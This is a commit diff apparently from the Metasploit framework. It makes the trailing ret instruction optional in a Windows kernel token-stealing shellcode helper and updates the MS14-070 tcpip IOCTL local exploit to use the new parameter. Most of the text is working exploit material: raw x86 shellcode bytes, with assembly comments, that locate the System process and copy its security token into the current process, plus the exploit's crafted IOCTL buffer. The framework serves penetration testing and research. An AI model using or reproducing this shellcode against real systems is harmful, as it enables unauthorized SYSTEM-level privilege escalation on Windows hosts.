Browse Source

Make the ret instruction for token stealing optional

Spencer McIntyre 4 years ago
parent
commit
5a39ba32f6

+ 9
- 5
lib/msf/core/exploit/local/windows_kernel.rb View File

@@ -116,10 +116,12 @@ module Exploit::Local::WindowsKernel
116 116
   #   original token to so it can be restored later.
117 117
   # @param arch [String] The architecture to return shellcode for. If this is nil,
118 118
   #   the arch will be guessed from the target and then module information.
119
+  # @param append_ret [Boolean] Append a ret instruction for use when being called
120
+  #   in place of HaliQuerySystemInformation.
119 121
   # @return [String] The token stealing shellcode.
120 122
   # @raise [ArgumentError] If the arch is incompatible.
121 123
   #
122
-  def token_stealing_shellcode(target, backup_token = nil, arch = nil)
124
+  def token_stealing_shellcode(target, backup_token = nil, arch = nil, append_ret = true)
123 125
     arch = target.opts['Arch'] if arch.nil? && target && target.opts['Arch']
124 126
     if arch.nil? && module_info['Arch']
125 127
       arch = module_info['Arch']
@@ -144,15 +146,17 @@ module Exploit::Local::WindowsKernel
144 146
         tokenstealing << "\x89\x1d" + [backup_token].pack('V')                       # mov dword ptr ds:backup_token, ebx   # Optionaly write a copy of the token to the address provided
145 147
       end
146 148
       tokenstealing << "\x8b\x80" + target['_APLINKS'] + "\x00\x00\x00"              # mov eax, dword ptr [eax+88h]  <====| # Retrieve FLINK from ActiveProcessLinks
147
-      tokenstealing << "\x81\xe8" + target['_APLINKS'] + "\x00\x00\x00"              # sub eax,88h                        | # Retrieve _EPROCESS Pointer from the ActiveProcessLinks
149
+      tokenstealing << "\x81\xe8" + target['_APLINKS'] + "\x00\x00\x00"              # sub eax, 88h                       | # Retrieve _EPROCESS Pointer from the ActiveProcessLinks
148 150
       tokenstealing << "\x81\xb8" + target['_UPID'] + "\x00\x00\x00\x04\x00\x00\x00" # cmp dword ptr [eax+84h], 4         | # Compares UniqueProcessId with 4 (The System Process on Windows XP)
149
-      tokenstealing << "\x75\xe8"                                                    # jne 0000101e ======================
150
-      tokenstealing << "\x8b\x90" + target['_TOKEN'] + "\x00\x00\x00"                # mov edx,dword ptr [eax+0C8h]     # Retrieves TOKEN and stores on EDX
151
+      tokenstealing << "\x75\xe8"                                                    # jne 0000101e ======================|
152
+      tokenstealing << "\x8b\x90" + target['_TOKEN'] + "\x00\x00\x00"                # mov edx, dword ptr [eax+0C8h]    # Retrieves TOKEN and stores on EDX
151 153
       tokenstealing << "\x8b\xc1"                                                    # mov eax, ecx                     # Retrieves KPROCESS stored on ECX
152 154
       tokenstealing << "\x89\x90" + target['_TOKEN'] + "\x00\x00\x00"                # mov dword ptr [eax+0C8h],edx     # Overwrites the TOKEN for the current KPROCESS
153 155
       tokenstealing << "\x5b"                                                        # pop ebx                          # Restores ebx
154 156
       tokenstealing << "\x5a"                                                        # pop edx                          # Restores edx
155
-      tokenstealing << "\xc2\x10"                                                    # ret 10h                          # Away from the kernel!
157
+      if append_ret
158
+        tokenstealing << "\xc2\x10"                                                  # ret 10h                          # Away from the kernel!
159
+      end
156 160
     else
157 161
       # if this is reached the issue most likely exists in the exploit module
158 162
       print_error('Unsupported arch for token stealing shellcode')

+ 1
- 1
modules/exploits/windows/local/ms14_070_tcpip_ioctl.rb View File

@@ -114,7 +114,7 @@ class Metasploit3 < Msf::Exploit::Local
114 114
 
115 115
     buf = "\x00\x04\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x02\x00\x00\x22\x00\x00\x00\x04\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00"
116 116
 
117
-    sc  = token_stealing_shellcode(target)[0..-3]
117
+    sc  = token_stealing_shellcode(target, nil, nil, false)
118 118
     # move up the stack frames looking for nt!KiSystemServicePostCall
119 119
     sc << "\x31\xc9"                     # xor ecx, ecx
120 120
     sc << "\x89\xeb"                     # mov ebx, ebp

Loading…
Cancel
Save